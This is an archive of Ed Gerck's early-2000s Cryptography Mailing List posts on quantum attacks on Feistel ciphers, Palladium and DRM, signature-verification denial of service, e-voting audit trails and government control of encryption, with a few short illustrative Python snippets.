> >when that distance is zero -- which provides the needle-in-the-haystack
> >solution,
> >even though each random state vector can be seen as a mixed state and will, with
> >higher probability, be representable by a linear combination of eigenvectors
> >with random coefficients, rather than by a single eigenvector.
>
> I must admit I can't for the life of me figure out what this paragraph
> was supposed to mean.  Maybe that's quantum for you.

In other words, even though most of the time a QC will be dealing with
mixed states (ie, states that cannot be represented by a single eigenvector),
a QC can nonetheless use a metric function (such as loosely described
by the original poster) in order to arrive at the desired needle-in-the-haystack
solution -- that might be a single eigenvector.

> But I take it we agree: The original poster's suggested "scheme" for
> cracking Feistel ciphers doesn't work, because quantum computers don't
> work like that.  Agreed?

As I commented at the time, and here I think we agree, the scheme does not
make Feistel ciphers easier to break by quantum computing. It is not a
"quantum algorithm". However, we need to recognize that the suggested scheme
is sound for any computer, and a QC *is* a computer -- it would just be no
better on a QC than an exhaustive search. In short, the method had nothing
"quantum" about it.

Here, the essential point for an effective QC solution is not whether the
calculation is possible (which it is if it can be computed), but that it should
be capable of being efficiently transposed to a quantum system.  Breaking a
Feistel cipher cannot, breaking RSA PK can.

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Quantum computers inch closer?

2002-09-02 Thread Ed Gerck



David Wagner wrote:

> David Honig  wrote:
> >At 08:56 PM 8/30/02 -0700, AARG!Anonymous wrote:
> >>The problem is that you can't forcibly collapse the state vector into your
> >>wished-for eigenstate, the one where the plaintext recognizer returns a 1.
> >>Instead, it will collapse into a random state, associated with a random
> >>key, and it is overwhelmingly likely that this key is one for which the
> >>recognizer returns 0.
> >
> >I thought the whole point of quantum-computer design is to build
> >systems where you *do* impose your arbitrary constraints on the system.
>
> Look again at those quantum texts.  AARG! is absolutely correct.
> Quantum doesn't work like the original poster seemed to wish it would;
> state vectors collapse into a random state, not into that one magic
> needle-in-a-haystack state you wish it could find.

The original poster was incorrect just in assuming that this would be an
effective method allowing Feistel ciphers to be broken.

The original poster is correct, however, in that a metric function can be defined
and used by a QC to calculate the distance between a random state and an
eigenstate with some desired properties, and thereby allow the QC to define
when that distance is zero -- which provides the needle-in-the-haystack solution,
even though each random state vector can be seen as a mixed state and will, with
higher probability, be representable by a linear combination of eigenvectors
with random coefficients, rather than by a single eigenvector.
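For the metric itself, a standard choice is one minus the fidelity, which vanishes exactly at the desired eigenstate. The toy computation below is classical and purely illustrative (not a quantum algorithm; the 4-dimensional example and function names are my own assumptions):

```python
import cmath

def normalize(v):
    # Scale a complex vector to unit norm.
    norm = sum(abs(a) ** 2 for a in v) ** 0.5
    return [a / norm for a in v]

def distance(psi, phi):
    # 1 - |<psi|phi>|^2: zero exactly when psi equals phi up to a
    # global phase, i.e. when the state *is* the target eigenvector.
    overlap = sum(a.conjugate() * b for a, b in zip(psi, phi))
    return 1 - abs(overlap) ** 2

target = normalize([1 + 0j, 0j, 0j, 0j])              # desired eigenstate
mixed = normalize([1 + 0j, 1 + 0j, 1 + 0j, 1 + 0j])   # equal superposition
same = [a * cmath.exp(1j * 0.7) for a in target]      # same state, new phase

print(round(distance(mixed, target), 3))  # 0.75: far from the needle
print(round(distance(same, target), 3))   # 0.0: distance vanishes
```

The metric is insensitive to the global phase, so "distance zero" really does single out the needle-in-the-haystack state.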

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Quantum computers inch closer?

2002-08-30 Thread Ed Gerck



bear wrote:

> On Sat, 17 Aug 2002, Perry E. Metzger wrote:
>
> >
> >[I don't know what to make of this story. Anyone have information? --Perry]
> >
> >Quantum computer called possible with today's tech
> >http://www.eet.com/story/OEG20020806S0030
> >
> ..
> The papers I've been reading claim that feistel ciphers (such as
> AES, DES, IDEA, etc) are fairly secure against QC.
>
> But I don't see how this can be true in the case where the
> opponent has a plaintext-ciphertext pair.
> ...
> I'm not a quantum physicist; I could be wrong here.  In
> fact, I'm probably wrong here.  But can anyone explain
> to me *why* I'm wrong here?

I'm a quantum physicist. Your argument is good but it has
nothing to do with quantum physics. The claim that feistel
ciphers are fairly secure against QC has to do with a
complex calculation that has no counterpart in a physical
system that could be used to "calculate" it. Not that the
calculation is not possible, but that it cannot be efficiently
transposed to a QC. Other ciphers may be a lot easier in this
regard  -- for example, there is a good similarity between
factoring the product of two primes and calculating
standing wave harmonics in a suitable quantum system.

Cheers,
Ed Gerck





-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



wrong data model -- Re: MS DRMOS Palladium -- The Trojan Horse OS

2002-07-04 Thread Ed Gerck

Marc:

There is no reason IMO to talk about economics when basic
properties are being ignored.

DRMOS will fail for pretty much the same basic reason that PKI
is failing. We are still trying to create an absolute reference
to measure "distance" in dataspace, when such reference
cannot exist by definition. Data is not an absolute property.
Choosing a reference, and even trying to enforce it, is illusory.
Distance can be measured without extrinsic references and this
is the only model that fits the properties that we need to assign
to data.

A wrong data model is being used, which nonetheless may still
sound intuitive. But one cannot revoke the law of gravity, even
though one might have a good market for such.

Cheers,
Ed Gerck


Marc Branchaud wrote:

> By patenting the DRMOS, only M$ will be allowed to create such a beast
> (OK, they could license the patent without restrictions -- pardon me
> while I pick myself up off the floor).  This means that the rest of the
> planet's OSes will have nothing even approaching DRM functionality,
> because nobody wants to be sued by M$.
>
> That's good, but OTOH other OSes will not build anything approaching
> secure computing either, for the same reason.
>
> I expect M$ OSes to provide both secure computing as well as the DRM
> nightmare outlined in Stallman's story.  I also expect all other OSes to
> provide neither secure computing nor DRM.
>
> Software patents.  Gotta love em!
>
> M.
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: TCPA / Palladium FAQ (was: Re: Ross's TCPA paper)

2002-06-27 Thread Ed Gerck


Interesting Q&A paper and list comments. Three
additional comments:

1. DRM and privacy  look like apple and speedboats.
Privacy includes the option of not telling, which DRM
does not have.

2. Palladium looks like just another vaporware from
Microsoft, to preempt a market like when MS promised
Windows and killed IBM's OS/2 in the process.

3. Embedding keys in mass-produced chips has
great sales potential. Now we may have to upgrade
processors also because the key  is compromised ;-)

Cheers,
Ed Gerck

PS: We would be much better off with OS/2, IMO.

Ross Anderson wrote:

> http://www.cl.cam.ac.uk/~rja14/tcpa-faq.html
>
> Ross
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Shortcut digital signature verification failure

2002-06-21 Thread Ed Gerck


A DoS would not pit one client against one server. A distributed attack
using several clients could overcome any single-server advantage.  A
scalable strategy would be a queue system for distributing load to
a pool of servers and a rating system for early rejection of repeated
bad queries from a source. The rating system would reset the source rating
after a pre-defined time, much like anti-congestion mechanisms on the Net.
Fast rejection of bogus signatures would help, but not alone.
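A minimal sketch of the rating part follows (the class name, thresholds, and reset interval are hypothetical; the queue/pool part is omitted):

```python
import time

class SourceRater:
    # Track bad queries per source; refuse service above a threshold,
    # and reset the rating after a quiet period, much like Net
    # anti-congestion mechanisms.
    def __init__(self, max_bad=3, reset_after=60.0):
        self.max_bad = max_bad
        self.reset_after = reset_after
        self.bad = {}  # source -> (bad_count, time_of_last_bad_query)

    def allow(self, source, now=None):
        now = time.monotonic() if now is None else now
        count, last = self.bad.get(source, (0, now))
        if now - last > self.reset_after:
            count = 0  # quiet period elapsed: forgive the source
        return count < self.max_bad

    def record_bad(self, source, now=None):
        now = time.monotonic() if now is None else now
        count, last = self.bad.get(source, (0, now))
        if now - last > self.reset_after:
            count = 0
        self.bad[source] = (count + 1, now)
```

A front-end using this would call `allow` before doing any signature work at all, so repeated bogus queries from one source are rejected cheaply while honest sources are unaffected.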

Cheers,
Ed Gerck

Bill Frantz wrote:

> I have been thinking about how to limit denial of service attacks on a
> server which will have to verify signatures on certain transactions.  It
> seems that an attacker can just send random (or even not so random) data
> for the signature and force the server to perform extensive processing just
> to reject the transaction.
>
> If there is a digital signature algorithm which has the property that most
> invalid signatures can be detected with a small amount of processing, then
> I can force the attacker to start expending his CPU to present signatures
> which will cause my server to expend it's CPU.  This might result in a
> better balance between the resources needed by the attacker and those
> needed by the server.
>
> Cheers - Bill
>
> -
> Bill Frantz   | The principal effect of| Periwinkle -- Consulting
> (408)356-8506 | DMCA/SDMI is to prevent| 16345 Englewood Ave.
> [EMAIL PROTECTED] | fair use.  | Los Gatos, CA 95032, USA
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: FC: E-voting paper analyzes "usability" problems of currentsystems

2002-06-20 Thread Ed Gerck


[Moderator's note: I'm not sure I agree with Mr. Gerck's conclusion,
given that I don't think the proof is incorrect, but... --Perry]


> Forwarded below is an email from Dr. Rebecca Mercuri whose
> PhD dissertation contained a proof that an electronic voting
> system can be either secure (tamper proof) or anonymous
> (as in secret ballot), but NOT BOTH, "The requirement for
> ballot privacy creates an unresolvable conflict with the
> use of audit trails in providing security assurance".

The conclusion is incorrect. There is actually more than one way
to provide for ballot privacy and use effective audit trails in
electronic voting systems.

One way is to have a (sufficiently redundant) witness system
that records what the voter sees and approves as the ballot
is cast by the voter, without recording who the voter is. The
witness system can include independent witnesses controlled
by  every party or observer of the election. The vote tally result
can be verified with a confidence level as close to 100% as desired
by tallying a percentage of those witness records.  The theoretical
basis for such a system is Shannon's 10th theorem.  For a presentation,
see  http://www.vote.caltech.edu/wote01/pdfs/gerck-witness.pdf
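The sampling step can be sketched as follows (a toy illustration with made-up numbers and function names, not the actual witness-system protocol):

```python
import random

def audit(witness_records, reported_share, sample_pct, tol=0.03):
    # Tally a random sample of the (anonymous) witness records and
    # check it against the reported result. Larger samples push the
    # confidence in the comparison as close to 100% as desired.
    k = max(1, int(len(witness_records) * sample_pct))
    sample = random.sample(witness_records, k)
    share = sum(1 for v in sample if v == "A") / k
    return abs(share - reported_share) <= tol

random.seed(7)
# Hypothetical election: 60% of 100,000 ballots for candidate A.
records = ["A"] * 60000 + ["B"] * 40000
print(audit(records, 0.60, sample_pct=0.05))
```

Note that the records carry no voter identity at all -- the audit checks only the tally, which is why privacy survives.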

Another way is to provide each voter with a double-blind
digital certificate that includes a nonce, using homomorphic
encryption to further protect the voting pattern from
disclosing the voter's identity (the Mafia attack).  The nonce
allows for an effective audit trail per voter without disclosing the voter's
identity.  See  http://www.vote.caltech.edu/wote01/pdfs/gerck.pdf

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: dejavu, Re: Hijackers' e-mails were unencrypted

2001-10-05 Thread Ed Gerck



"Jay D. Dyson" wrote:

> On Wed, 3 Oct 2001, Ed Gerck wrote:
>
> > With all due respect to the need to vent our fears, may I remind this
> > list that we have all seen this before (that is, governments trying to
> > control crypto), from key-escrow to GAK, and we all know that it will
> > not work -- and for many reasons.  A main one IMO is that it is simply
> > impossible to prevent anyone from sending an encrypted message to anyone
> > else except by controlling the receivers and the transmitters (as done
> > in WWII, for example).
>
> Like you, I once believed that our government would follow
> sensible courses of action with respect to technology.  That time has
> passed.
>
> The advent of DMCA should have served as a wake-up call to the
> reality that our government no longer even operates under the *pretense*
> of sanity or rationality with respect to technology laws.

My point is not that a government would not, but that a government
could not control the use of crypto.  It would not work.

My suggestion was that controlling routing and addresses would
be much more efficient and would NOT require new laws and
erosion of communication privacy.

> And anyone who dares to insist that I'm being alarmist can go
> reverse engineer the latest commercial "security solution," publish the
> results, and see just how "free" they remain.

Maybe it's time to put sanity back into the DMCA crying.

In the infamous case of Microsoft vs. Stacker many years ago, when MS
was found guilty of using Stacker's code in a MS product, Stacker was
nonetheless found guilty of proving it by reverse engineering -- in a
notion similar to trespassing.

So, as stressed in that judicial case that predates DMCA, if I would get a
court order to reverse engineer the latest commercial "security solution"
and be allowed to publish the results, I would remain free and within
the legal limits. Otherwise, I would not -- DMCA or not.

Comments?

Cheers,

Ed Gerck




-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



dejavu, Re: Hijackers' e-mails were unencrypted

2001-10-03 Thread Ed Gerck


List:

With all due respect to the need to vent our fears, may I remind
this list that we have all seen this before (that is, governments
trying to control crypto), from key-escrow to GAK, and we all
know that it will not work -- and for many reasons.  A main one
IMO is that it is simply impossible to prevent anyone from
sending an encrypted message to anyone else except by
controlling the receivers and the transmitters (as done in WWII,
for example). Since controlling receivers and transmitters is
now really impossible, all one can do is control routing and
addresses. I suggest this would be a much more efficient way
to reduce the misuse of our communication networks. For
example, if one email address under surveillance receives
email from X, Y and Z, then X, Y and Z will also be added
to the surveillance. Even if everything is encrypted, people
and computers can be verified.
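The surveillance-spreading rule described above is just a transitive closure over the traffic graph -- no decryption is needed. A sketch, with hypothetical addresses and a made-up data structure mapping each address to those who sent mail to it:

```python
from collections import deque

def expand_watchlist(seed, senders_to):
    # Traffic-analysis spread: anyone who sends mail to a watched
    # address becomes watched too, transitively.
    watched = {seed}
    queue = deque([seed])
    while queue:
        addr = queue.popleft()
        for peer in senders_to.get(addr, ()):
            if peer not in watched:
                watched.add(peer)
                queue.append(peer)
    return watched

# Hypothetical traffic logs: address -> addresses that mailed it.
traffic = {
    "target@example.org": ["x@a.net", "y@b.net"],
    "x@a.net": ["z@c.net"],
}
print(sorted(expand_watchlist("target@example.org", traffic)))
```

Here x, y and z all end up under surveillance starting from a single watched address, even though every message body could be encrypted.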

In addition, we need to avoid adding fuel to the misconception
that encryption is somehow "dangerous" or should be controlled
as weapons are. The only function of a weapon is to inflict harm;
the only function of encryption is to provide privacy.

Cheers,

Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]